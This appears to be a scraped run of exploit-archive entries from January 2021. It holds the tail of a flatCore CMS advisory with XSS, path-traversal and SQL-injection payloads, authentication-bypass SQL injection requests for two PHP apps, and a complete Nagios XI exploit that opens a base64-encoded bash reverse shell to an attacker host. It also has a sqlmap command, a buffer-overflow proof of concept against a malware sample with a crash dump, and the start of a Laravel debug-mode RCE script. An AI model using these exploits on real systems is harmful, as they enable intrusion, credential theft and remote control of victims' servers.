accepts malicious client side script without proper input sanitization. For
example, a malicious user can leverage this vulnerability to steal cookies
from a victim user and perform a session hijacking attack which may then lead to
unauthorized access to the site.
2) Stored Cross-Site Scripting (Authenticated user) (CVE-2021-23836)
A stored cross-site scripting vulnerability was identified in the 'prefs_smtp_psw'
HTTP request body parameter for the 'acp' interface. An admin user can inject
malicious client side script to the affected parameter without any form of
input sanitization. The injected payload will be executed in the browser of a
user whenever one visits the affected module page.
3) Local File Disclosure (Authenticated user) (CVE-2021-23835)
A local file disclosure vulnerability was identified in the 'docs_file'
HTTP request body parameter for the 'acp' interface which can be exploited with
admin access rights. The affected parameter which retrieves the contents of the
specified file was found to be accepting malicious user inputs without proper input
sanitization, thus leading to retrieval of backend server sensitive files, for
example /etc/passwd, sqlite database files, PHP source code etc.
4) Time Based Blind SQL Injection (Authenticated user) (CVE-2021-23837)
A time based blind SQL injection was identified in the 'selected_folder'
HTTP request body parameter for the 'acp' interface. The affected parameter
which retrieves the file contents of the specified folder was found to be
accepting malicious user inputs without proper input sanitization, thus leading
to SQL injection. Database related information can be successfully retrieved.
Proof of concept:
-----------------
1) Reflected Cross-Site Scripting (Authenticated user) (CVE-2021-23838)
An authenticated admin user can exploit this vulnerability by manipulating
the 'media_filter' parameter found in the Files/ Manage Files module.
URL : http://$HOST/acp/acp.php?tn=filebrowser&sub=browse
METHOD : POST
PARAMETER : media_filter
PAYLOAD : aaa%3cscript%3ealert(document.cookie)%3c%2fscript%3ebbb
2) Stored Cross-Site Scripting (Authenticated user) (CVE-2021-23836)
An authenticated admin user can exploit this vulnerability by manipulating
the 'prefs_smtp_psw' parameter found in the System/ E-Mail module.
URL : http://$HOST/acp/acp.php?tn=system&sub=mail
METHOD : POST
PARAMETER : prefs_smtp_psw
PAYLOAD : '%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3eaaabbb
3) Local File Disclosure (Authenticated user) (CVE-2021-23835)
An authenticated admin user can exploit this vulnerability by manipulating
the 'docs_file' parameter found in the help module.
URL : http://$HOST/acp/acp.php
METHOD : POST
PARAMETER : docs_file
PAYLOAD : %2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
4) Time Based Blind SQL Injection (Authenticated user) (CVE-2021-23837)
An authenticated admin user can exploit this vulnerability by manipulating
the 'selected_folder' parameter found in the Files/ Manage Files module.
URL : http://$HOST/acp/acp.php?tn=filebrowser&sub=browse
METHOD : POST
PARAMETER : selected_folder
PAYLOAD : %' AND 8483=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))) AND 'eJQr%'='eJQr
Vulnerable / tested versions:
-----------------------------
flatCore CMS version 2.0.0 (Build 122) has been tested, which was the latest
version available at the time of the test. Previous versions may also be affected.
Vendor contact timeline:
------------------------
2020-12-14 | Contacting vendor through support@flatcore.de
2020-12-17 | Advisory sent to the vendor
2020-12-31 | Requesting status update from vendor
2021-01-05 | Vendor replied that the reported issues have been fixed in
version 2.0.0 (Build 139) released at their official GitHub page
2021-01-13 | Release of security advisory.
Solution:
---------
The fixed version 2.0.0 (Build 139) is available for download at:
https://github.com/flatCore/flatCore-CMS
Workaround:
-----------
None
Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult, an Atos company
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos company. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Yew Chung Cheah, Calvin Phang / @2021
Online Hotel Reservation version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
3b3b96192c21768363de2b321dc24414# Exploit Title: Online Hotel Reservation 1.0 - Admin Authentication Bypass
# Exploit Author: Richard Jones
# Note: Shout out to boku (Bobby Cooke) for helping me get started on 0day's!!
# Date: 2021-01-13
# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html
# Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
#Exploit URL: http://TARGET/marimar/admin/index.php
Host: TARGET
POST /marimar/admin/login.php HTTP/1.1
Content-Length: 57
Connection: close
Cookie: PHPSESSID=82sevuai2qhh9h8b5jbucn0616
email=admin%27+or+1%3D1+--+-ac1d&pass=asdasdasd&btnlogin=
Online Movie Streaming version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
82d3e3b9ac3251037440fca5f40c392d# Exploit Title: Online Movie Streaming 1.0 - Admin Authentication Bypass
# Exploit Author: Richard Jones
# Date: 2021-01-13
# Vendor Homepage: https://www.sourcecodester.com/php/14640/online-movie-streaming-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14640&title=+Online+Movie+Streaming+in+PHP+with+Full+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
#Exploit URL: http://TARGET/onlinemovies/Plogin.php
POST /onlinemovies/Plogin.php HTTP/1.1
Host: TARGET
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Origin: http://TARGET
Connection: close
Cookie: PHPSESSID=p09pmo49cb8dr0s75r1jhttlvj
Upgrade-Insecure-Requests: 1
mail=admin%40a.com&pass=ad`'+or+1=1+--+-a&login=
Nagios XI version 5.7.x authenticated remote code execution exploit.
f073a75639db0a35ee5dc80c46f26db4# Exploit Title: Nagios XI 5.7.X - Remote Code Exection RCE (Authenticated)
# Date: 19/12/2020
# Exploit Author: Haboob Team (https://haboob.sa)
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
# Version: Nagios XI 5.7.x
# Tested on: (Ubuntu 18.04 / PHP 7.2.24) & Vendor's custom VM
# CVE: CVE-2020-35578
#!/usr/bin/python3
# pip3 install bs4 lxml
import requests
import sys
import warnings
from bs4 import BeautifulSoup
import base64
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
if len(sys.argv) != 6:
print("[~] Usage : python3 nagiosxi-rce.py http(s)://url username password reverse_ip reverse_port")
print("[~] Example : python3 nagiosxi-rce.py https://192.168.224.139 nagiosadmin P@ssw0rd 192.168.224.138 443")
exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]
request = requests.session()
def login():
# Request nsp value (Nagios Session Protection, used to prevent CSRF attacks)
nsp_str_req = request.get(url+"/nagiosxi/login.php", verify=False)
content = nsp_str_req.text
soup = BeautifulSoup(content, "lxml")
nsp_str = soup.find_all('input')[0].get('value')
print("[+] Extract login nsp token : %s" % nsp_str)
# Login
login_info = {
"nsp": nsp_str,
"pageopt": "login",
"username": username,
"password": password
}
login_request = request.post(url + "/nagiosxi/login.php", login_info, verify=False)
login_text = login_request.text
# Check Login Status
if "Core Config Manager" in login_text:
return True
else:
print("[-] Login ... Failed!")
return False
def execute_payload():
# Request nsp value (Nagios Session Protection, used to prevent CSRF attacks)
print("[+] Request upload form ...")
nsp_str_req = request.get(url+"/nagiosxi/admin/monitoringplugins.php", verify=False)
content = nsp_str_req.text
soup = BeautifulSoup(content, "lxml")
nsp_str = soup.find_all('input')[1].get('value')
print("[+] Extract upload nsp token : %s" % nsp_str)
# Payload Base64 Encoding
payload_decoded = "bash -i >& /dev/tcp/%s/%s 0>&1" % (ip, port)
payload_bytes = payload_decoded.encode('ascii')
base64_bytes = base64.b64encode(payload_bytes)
payload_encoded = base64_bytes.decode('ascii')
payload = ";echo " + payload_encoded + " | base64 -d | bash;#"
print("[+] Base64 encoded payload : %s" % payload)
# Payload Execution
multipart_form_data = {
'upload': (None, '', None),
'nsp': (None, nsp_str, None),
'uploadedfile': (payload, 'whatever', 'text/plain'),
'convert_to_unix': (None, '1', None),
}
print("[+] Sending payload ...")
print("[+] Check your nc ...")
rce = request.post(url +"/nagiosxi/admin/monitoringplugins.php", files=multipart_form_data, verify=False)
if login():
print("[+] Login ... Success!")
execute_payload()
Online Shopping Cart version 1.0 suffers from a remote SQL injection vulnerability.
dea39b3434f697b559c641e668911a5e# Exploit Title: Online Shopping Cart System 1.0 - 'id' SQL Injection
# Date: 14.1.2021
# Exploit Author: Aydın Baran Ertemir
# Vendor Homepage: https://www.sourcecodester.com/php/14668/online-shopping-cart-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14668&title=Online+Shopping+Cart+System+in+PHP+with+Full+Source+Code
# Version: 1.0
# Tested on: Kali Linux
Use SQLMAP:
sqlmap -u "localhost/cart_remove.php?id=1" --dbs --batch --level 3 --risk 3
Backdoor.Win32.Ketch.i malware suffers from a remote stack buffer overflow vulnerability.
db079ee4491b3f466c3e96c16dc1b444Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/ee314e1b913a09ec86c63d7186d8f0b8.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.Ketch.i
Vulnerability: SEH Remote Stack Buffer Overflow
Description: Ketch makes HTTP request to port 80 for a file named script.dat, upon processing the server response of 1,612 bytes or more we can trigger SEH buffer overflow.
Our exploit pattern if using "AAAAAAAAA" will get XOR'd with the value 30 and convert it to 71717171 instead of 41414141, so use "q" for exploit pattern 41414141.
Reason is first it gets converted so uppercase becomes lowercase and is XOR'd with value 30. The character "A" becomes "q" 71 so it is difficult to control chars.
Therefore, if we want to see the typical 41414141 exploit pattern use lowercase "q" character. Then when 71 (q) gets XOR with 30 it will become 41 (A).
Type: PE32
MD5: ee314e1b913a09ec86c63d7186d8f0b8
Vuln ID: MVID-2021-0024
Dropped files:
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 01/13/2021
Memory Dump:
This dump file has an exception of interest stored in it.
The stored exception information can be accessed via .ecxr.
(95c.11f0): Stack overflow - code c00000fd (first/second chance not available)
eax=00000000 ebx=00000000 ecx=41414141 edx=773e9d70 esi=000a3848 edi=000a3d0c
eip=773ce916 esp=000a3790 ebp=000a3830 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216
ntdll!ZwQueryInformationProcess+0x26:
773ce916 c21400 ret 14h
0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** WARNING: Unable to verify checksum for Backdoor.Win32.Ketch.i.ee314e1b913a09ec86c63d7186d8f0b8.exe
*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Ketch.i.ee314e1b913a09ec86c63d7186d8f0b8.exe
FAULTING_IP:
Backdoor_Win32_Ketch_i_ee314e1b913a09ec86c63d7186d8f0b8+50f9
004050f9 8802 mov byte ptr [edx],al
EXCEPTION_RECORD: 0019f30c -- (.exr 0x19f30c)
ExceptionAddress: 004050f9 (Backdoor_Win32_Ketch_i_ee314e1b913a09ec86c63d7186d8f0b8+0x000050f9)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 001a0000
Attempt to write to address 001a0000
PROCESS_NAME: Backdoor.Win32.Ketch.i.ee314e1b913a09ec86c63d7186d8f0b8.exe
ERROR_CODE: (NTSTATUS) 0xc00000fd - A new guard page for the stack cannot be created.
EXCEPTION_CODE: (NTSTATUS) 0xc00000fd - A new guard page for the stack cannot be created.
EXCEPTION_PARAMETER1: 00000001
EXCEPTION_PARAMETER2: 000a2fe8
MOD_LIST: <ANALYSIS/>
NTGLOBALFLAG: 0
APPLICATION_VERIFIER_FLAGS: 0
FAILED_INSTRUCTION_ADDRESS:
+50f9
41414141 ?? ???
CONTEXT: 0019f35c -- (.cxr 0x19f35c)
eax=00000041 ebx=02851dbc ecx=02854285 edx=001a0000 esi=0000064f edi=02853ca0
eip=004050f9 esp=0019f7bc ebp=0019f954 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
Backdoor_Win32_Ketch_i_ee314e1b913a09ec86c63d7186d8f0b8+0x50f9:
004050f9 8802 mov byte ptr [edx],al ds:002b:001a0000=41
Resetting default scope
READ_ADDRESS: 41414141
FOLLOWUP_IP:
Backdoor_Win32_Ketch_i_ee314e1b913a09ec86c63d7186d8f0b8+50f9
004050f9 8802 mov byte ptr [edx],al
WRITE_ADDRESS: 001a0000
LAST_CONTROL_TRANSFER: from 02852ff0 to 004050f9
FAULTING_THREAD: ffffffff
BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_FILL_PATTERN_41414141
PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_FILL_PATTERN_41414141
DEFAULT_BUCKET_ID: STACK_OVERFLOW_FILL_PATTERN_41414141
IP_ON_HEAP: 02852ff0
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.
IP_IN_FREE_BLOCK: 41414141
FRAME_ONE_INVALID: 1
STACK_TEXT:
0019f7bc 004050f9 backdoor_win32_ketch_i+0x50f9
0019f95c 02852ff0 unknown!unknown+0x0
0019f964 773a2abf ntdll!RtlpAllocateHeap+0xcf
0019fb30 41414141 unknown!printable+0x0
0019fb44 41414141 unknown!printable+0x0
0019fb48 41414141 unknown!printable+0x0
0019fb4c 41414141 unknown!printable+0x0
0019fb50 41414141 unknown!printable+0x0
0019fb54 41414141 unknown!printable+0x0
0019fb58 41414141 unknown!printable+0x0
0019fb5c 41414141 unknown!printable+0x0
0019fb60 41414141 unknown!printable+0x0
0019fb64 41414141 unknown!printable+0x0
0019fb68 41414141 unknown!printable+0x0
0019fb6c 41414141 unknown!printable+0x0
0019fb70 41414141 unknown!printable+0x0
0019fb74 41414141 unknown!printable+0x0
0019fb78 41414141 unknown!printable+0x0
0019fb7c 41414141 unknown!printable+0x0
0019fb80 41414141 unknown!printable+0x0
0019fb84 41414141 unknown!printable+0x0
0019fb88 41414141 unknown!printable+0x0
0019fb8c 41414141 unknown!printable+0x0
0019fb90 41414141 unknown!printable+0x0
0019fb94 41414141 unknown!printable+0x0
0019fb98 41414141 unknown!printable+0x0
0019fb9c 41414141 unknown!printable+0x0
0019fba0 41414141 unknown!printable+0x0
0019fba4 41414141 unknown!printable+0x0
0019fba8 41414141 unknown!printable+0x0
0019fbac 41414141 unknown!printable+0x0
0019fbb0 41414141 unknown!printable+0x0
0019fbb4 41414141 unknown!printable+0x0
0019fbb8 41414141 unknown!printable+0x0
0019fbbc 41414141 unknown!printable+0x0
0019fbc0 41414141 unknown!printable+0x0
0019fbc4 41414141 unknown!printable+0x0
0019fbc8 41414141 unknown!printable+0x0
0019fbcc 41414141 unknown!printable+0x0
0019fbd0 41414141 unknown!printable+0x0
0019fbd4 41414141 unknown!printable+0x0
0019fbd8 41414141 unknown!printable+0x0
0019fbdc 41414141 unknown!printable+0x0
0019fbe0 41414141 unknown!printable+0x0
0019fbe4 41414141 unknown!printable+0x0
0019fbe8 41414141 unknown!printable+0x0
0019fbec 41414141 unknown!printable+0x0
0019fbf0 41414141 unknown!printable+0x0
0019fbf4 41414141 unknown!printable+0x0
0019fbf8 41414141 unknown!printable+0x0
0019fbfc 41414141 unknown!printable+0x0
0019fc00 41414141 unknown!printable+0x0
0019fc04 41414141 unknown!printable+0x0
0019fc08 41414141 unknown!printable+0x0
0019fc0c 41414141 unknown!printable+0x0
0019fc10 41414141 unknown!printable+0x0
0019fc14 41414141 unknown!printable+0x0
0019fc18 41414141 unknown!printable+0x0
0019fc1c 41414141 unknown!printable+0x0
0019fc20 41414141 unknown!printable+0x0
0019fc24 41414141 unknown!printable+0x0
0019fc28 41414141 unknown!printable+0x0
0019fc2c 41414141 unknown!printable+0x0
0019fc30 41414141 unknown!printable+0x0
0019fc34 41414141 unknown!printable+0x0
0019fc38 41414141 unknown!printable+0x0
0019fc3c 41414141 unknown!printable+0x0
0019fc40 41414141 unknown!printable+0x0
0019fc44 41414141 unknown!printable+0x0
0019fc48 41414141 unknown!printable+0x0
0019fc4c 41414141 unknown!printable+0x0
0019fc50 41414141 unknown!printable+0x0
0019fc54 41414141 unknown!printable+0x0
0019fc58 41414141 unknown!printable+0x0
0019fc5c 41414141 unknown!printable+0x0
0019fc60 41414141 unknown!printable+0x0
0019fc64 41414141 unknown!printable+0x0
0019fc68 41414141 unknown!printable+0x0
0019fc6c 41414141 unknown!printable+0x0
0019fc70 41414141 unknown!printable+0x0
0019fc74 41414141 unknown!printable+0x0
0019fc78 41414141 unknown!printable+0x0
0019fc7c 41414141 unknown!printable+0x0
0019fc80 41414141 unknown!printable+0x0
0019fc84 41414141 unknown!printable+0x0
0019fc88 41414141 unknown!printable+0x0
0019fc8c 41414141 unknown!printable+0x0
0019fc90 41414141 unknown!printable+0x0
0019fc94 41414141 unknown!printable+0x0
0019fc98 41414141 unknown!printable+0x0
0019fc9c 41414141 unknown!printable+0x0
0019fca0 41414141 unknown!printable+0x0
0019fca4 41414141 unknown!printable+0x0
0019fca8 41414141 unknown!printable+0x0
0019fcac 41414141 unknown!printable+0x0
0019fcb0 41414141 unknown!printable+0x0
0019fcb4 41414141 unknown!printable+0x0
0019fcb8 41414141 unknown!printable+0x0
0019fcbc 41414141 unknown!printable+0x0
0019fcc0 41414141 unknown!printable+0x0
0019fcc4 41414141 unknown!printable+0x0
0019fcc8 41414141 unknown!printable+0x0
0019fccc 41414141 unknown!printable+0x0
0019fcd0 41414141 unknown!printable+0x0
0019fcd4 41414141 unknown!printable+0x0
0019fcd8 41414141 unknown!printable+0x0
0019fcdc 41414141 unknown!printable+0x0
0019fce0 41414141 unknown!printable+0x0
0019fce4 41414141 unknown!printable+0x0
0019fce8 41414141 unknown!printable+0x0
0019fcec 41414141 unknown!printable+0x0
0019fcf0 41414141 unknown!printable+0x0
0019fcf4 41414141 unknown!printable+0x0
0019fcf8 41414141 unknown!printable+0x0
0019fcfc 41414141 unknown!printable+0x0
0019fd00 41414141 unknown!printable+0x0
0019fd04 41414141 unknown!printable+0x0
0019fd08 41414141 unknown!printable+0x0
0019fd0c 41414141 unknown!printable+0x0
0019fd10 41414141 unknown!printable+0x0
0019fd14 41414141 unknown!printable+0x0
0019fd18 41414141 unknown!printable+0x0
0019fd1c 41414141 unknown!printable+0x0
0019fd20 41414141 unknown!printable+0x0
0019fd24 41414141 unknown!printable+0x0
0019fd28 41414141 unknown!printable+0x0
0019fd2c 41414141 unknown!printable+0x0
0019fd30 41414141 unknown!printable+0x0
0019fd34 41414141 unknown!printable+0x0
0019fd38 41414141 unknown!printable+0x0
0019fd3c 41414141 unknown!printable+0x0
0019fd40 41414141 unknown!printable+0x0
0019fd44 41414141 unknown!printable+0x0
0019fd48 41414141 unknown!printable+0x0
0019fd4c 41414141 unknown!printable+0x0
0019fd50 41414141 unknown!printable+0x0
0019fd54 41414141 unknown!printable+0x0
0019fd58 41414141 unknown!printable+0x0
0019fd5c 41414141 unknown!printable+0x0
0019fd60 41414141 unknown!printable+0x0
0019fd64 41414141 unknown!printable+0x0
0019fd68 41414141 unknown!printable+0x0
0019fd6c 41414141 unknown!printable+0x0
0019fd70 41414141 unknown!printable+0x0
0019fd74 41414141 unknown!printable+0x0
0019fd78 41414141 unknown!printable+0x0
0019fd7c 41414141 unknown!printable+0x0
0019fd80 41414141 unknown!printable+0x0
0019fd84 41414141 unknown!printable+0x0
0019fd88 41414141 unknown!printable+0x0
0019fd8c 41414141 unknown!printable+0x0
0019fd90 41414141 unknown!printable+0x0
0019fd94 41414141 unknown!printable+0x0
0019fd98 41414141 unknown!printable+0x0
0019fd9c 41414141 unknown!printable+0x0
0019fda0 41414141 unknown!printable+0x0
0019fda4 41414141 unknown!printable+0x0
0019fda8 41414141 unknown!printable+0x0
0019fdac 41414141 unknown!printable+0x0
0019fdb0 41414141 unknown!printable+0x0
0019fdb4 41414141 unknown!printable+0x0
0019fdb8 41414141 unknown!printable+0x0
0019fdbc 41414141 unknown!printable+0x0
0019fdc0 41414141 unknown!printable+0x0
0019fdc4 41414141 unknown!printable+0x0
0019fdc8 41414141 unknown!printable+0x0
0019fdcc 41414141 unknown!printable+0x0
0019fdd0 41414141 unknown!printable+0x0
0019fdd4 41414141 unknown!printable+0x0
0019fdd8 41414141 unknown!printable+0x0
0019fddc 41414141 unknown!printable+0x0
0019fde0 41414141 unknown!printable+0x0
0019fde4 41414141 unknown!printable+0x0
0019fde8 41414141 unknown!printable+0x0
0019fdec 41414141 unknown!printable+0x0
0019fdf0 41414141 unknown!printable+0x0
0019fdf4 41414141 unknown!printable+0x0
0019fdf8 41414141 unknown!printable+0x0
0019fdfc 41414141 unknown!printable+0x0
0019fe00 41414141 unknown!printable+0x0
0019fe04 41414141 unknown!printable+0x0
0019fe08 41414141 unknown!printable+0x0
0019fe0c 41414141 unknown!printable+0x0
0019fe10 41414141 unknown!printable+0x0
0019fe14 41414141 unknown!printable+0x0
0019fe18 41414141 unknown!printable+0x0
0019fe1c 41414141 unknown!printable+0x0
0019fe20 41414141 unknown!printable+0x0
0019fe24 41414141 unknown!printable+0x0
0019fe28 41414141 unknown!printable+0x0
0019fe2c 41414141 unknown!printable+0x0
0019fe30 41414141 unknown!printable+0x0
0019fe34 41414141 unknown!printable+0x0
0019fe38 41414141 unknown!printable+0x0
0019fe3c 41414141 unknown!printable+0x0
0019fe40 41414141 unknown!printable+0x0
0019fe44 41414141 unknown!printable+0x0
0019fe48 41414141 unknown!printable+0x0
0019fe4c 41414141 unknown!printable+0x0
0019fe50 41414141 unknown!printable+0x0
0019fe54 41414141 unknown!printable+0x0
0019fe58 41414141 unknown!printable+0x0
0019fe5c 41414141 unknown!printable+0x0
0019fe60 41414141 unknown!printable+0x0
0019fe64 41414141 unknown!printable+0x0
0019fe68 41414141 unknown!printable+0x0
0019fe6c 41414141 unknown!printable+0x0
0019fe70 41414141 unknown!printable+0x0
0019fe74 41414141 unknown!printable+0x0
0019fe78 41414141 unknown!printable+0x0
0019fe7c 41414141 unknown!printable+0x0
0019fe80 41414141 unknown!printable+0x0
0019fe84 41414141 unknown!printable+0x0
0019fe88 41414141 unknown!printable+0x0
0019fe8c 41414141 unknown!printable+0x0
0019fe90 41414141 unknown!printable+0x0
0019fe94 41414141 unknown!printable+0x0
0019fe98 41414141 unknown!printable+0x0
0019fe9c 41414141 unknown!printable+0x0
0019fea0 41414141 unknown!printable+0x0
0019fea4 41414141 unknown!printable+0x0
0019fea8 41414141 unknown!printable+0x0
0019feac 41414141 unknown!printable+0x0
0019feb0 41414141 unknown!printable+0x0
0019feb4 41414141 unknown!printable+0x0
0019feb8 41414141 unknown!printable+0x0
0019febc 41414141 unknown!printable+0x0
0019fec0 41414141 unknown!printable+0x0
0019fec4 41414141 unknown!printable+0x0
0019fec8 41414141 unknown!printable+0x0
0019fecc 41414141 unknown!printable+0x0
0019fed0 41414141 unknown!printable+0x0
0019fed4 41414141 unknown!printable+0x0
0019fed8 41414141 unknown!printable+0x0
0019fedc 41414141 unknown!printable+0x0
0019fee0 41414141 unknown!printable+0x0
0019fee4 41414141 unknown!printable+0x0
0019fee8 41414141 unknown!printable+0x0
0019feec 41414141 unknown!printable+0x0
0019fef0 41414141 unknown!printable+0x0
0019fef4 41414141 unknown!printable+0x0
0019fef8 41414141 unknown!printable+0x0
0019fefc 41414141 unknown!printable+0x0
0019ff00 41414141 unknown!printable+0x0
0019ff04 41414141 unknown!printable+0x0
0019ff08 41414141 unknown!printable+0x0
0019ff0c 41414141 unknown!printable+0x0
0019ff10 41414141 unknown!printable+0x0
0019ff14 41414141 unknown!printable+0x0
0019ff18 41414141 unknown!printable+0x0
0019ff1c 41414141 unknown!printable+0x0
0019ff20 41414141 unknown!printable+0x0
0019ff24 41414141 unknown!printable+0x0
0019ff28 41414141 unknown!printable+0x0
0019ff2c 41414141 unknown!printable+0x0
0019ff30 41414141 unknown!printable+0x0
0019ff34 41414141 unknown!printable+0x0
0019ff38 41414141 unknown!printable+0x0
0019ff3c 41414141 unknown!printable+0x0
0019ff40 41414141 unknown!printable+0x0
0019ff44 41414141 unknown!printable+0x0
0019ff48 41414141 unknown!printable+0x0
0019ff4c 41414141 unknown!printable+0x0
0019ff50 41414141 unknown!printable+0x0
0019ff54 41414141 unknown!printable+0x0
0019ff58 41414141 unknown!printable+0x0
0019ff5c 41414141 unknown!printable+0x0
0019ff60 41414141 unknown!printable+0x0
0019ff64 41414141 unknown!printable+0x0
0019ff68 41414141 unknown!printable+0x0
0019ff6c 41414141 unknown!printable+0x0
0019ff70 41414141 unknown!printable+0x0
0019ff74 41414141 unknown!printable+0x0
0019ff78 41414141 unknown!printable+0x0
0019ff7c 41414141 unknown!printable+0x0
0019ff80 41414141 unknown!printable+0x0
0019ff84 41414141 unknown!printable+0x0
0019ff88 41414141 unknown!printable+0x0
0019ff8c 41414141 unknown!printable+0x0
0019ff90 41414141 unknown!printable+0x0
0019ff94 41414141 unknown!printable+0x0
0019ff98 41414141 unknown!printable+0x0
0019ff9c 41414141 unknown!printable+0x0
0019ffa0 41414141 unknown!printable+0x0
0019ffa4 41414141 unknown!printable+0x0
0019ffa8 41414141 unknown!printable+0x0
0019ffac 41414141 unknown!printable+0x0
0019ffb0 41414141 unknown!printable+0x0
0019ffb4 41414141 unknown!printable+0x0
0019ffb8 41414141 unknown!printable+0x0
0019ffbc 41414141 unknown!printable+0x0
0019ffc0 41414141 unknown!printable+0x0
0019ffc4 41414141 unknown!printable+0x0
0019ffc8 41414141 unknown!printable+0x0
0019ffcc 41414141 unknown!printable+0x0
0019ffd0 41414141 unknown!printable+0x0
0019ffd4 41414141 unknown!printable+0x0
0019ffd8 41414141 unknown!printable+0x0
0019ffdc 41414141 unknown!printable+0x0
0019ffe0 41414141 unknown!printable+0x0
0019ffe4 41414141 unknown!printable+0x0
0019ffe8 41414141 unknown!printable+0x0
0019ffec 41414141 unknown!printable+0x0
0019fff0 41414141 unknown!printable+0x0
0019fff4 41414141 unknown!printable+0x0
0019fff8 41414141 unknown!printable+0x0
0019fffc 41414141 unknown!
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: backdoor_win32_ketch_i+50f9
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: Backdoor_Win32_Ketch_i_ee314e1b913a09ec86c63d7186d8f0b8
IMAGE_NAME: Backdoor.Win32.Ketch.i.ee314e1b913a09ec86c63d7186d8f0b8.exe
DEBUG_FLR_IMAGE_TIMESTAMP: 4021b2e8
STACK_COMMAND: .cxr 000000000019F35C ; kb ; dds 19f7bc ; kb
BUCKET_ID: APPLICATION_FAULT_STACK_OVERFLOW_FILL_PATTERN_41414141_BAD_IP_backdoor_win32_ketch_i+50f9
FAILURE_BUCKET_ID: STACK_OVERFLOW_FILL_PATTERN_41414141_c00000fd_Backdoor.Win32.Ketch.i.ee314e1b913a09ec86c63d7186d8f0b8.exe!Unknown
Exploit/PoC:
python -c "print 'q'*1612"> script.dat
python -m SimpleHTTPServer 80
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Laravel version 8.4.2 suffers from a debug mode remote code execution vulnerability.
777a54e04861b26de13d508208e0dd5b# Exploit Title: Laravel 8.4.2 debug mode - Remote code execution
# Date: 1.14.2021
# Exploit Author: SunCSR Team
# Vendor Homepage: https://laravel.com/
# References:
# https://www.ambionics.io/blog/laravel-debug-rce
# https://viblo.asia/p/6J3ZgN8PKmB
# Version: <= 8.4.2
# Tested on: Ubuntu 18.04 + nginx + php 7.4.3
# Github POC: https://github.com/khanhnv-2091/laravel-8.4.2-rce
#!/usr/bin/env python3
import requests, sys, re, os
header={
"Accept": "application/json"
}
data = {
"solution":"Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",\
"parameters":{
"variableName":"cm0s",
"viewFile":""
}
}
def clear_log(url='', viewFile=''):
global data
data['parameters']['viewFile'] = viewFile
while (requests.post(url=url, json=data, headers=header, verify=False).status_code != 200): pass
requests.post(url=url, json=data, headers=header, verify=False)
requests.post(url=url, json=data, headers=header, verify=False)
def create_payload(url='', viewFile=''):
global data
data['parameters']['viewFile'] = viewFile
resp = requests.post(url=url, json=data, headers=header, verify=False)
if resp.status_code == 500 and f'file_get_contents({viewFile})' in resp.text:
return True
return False
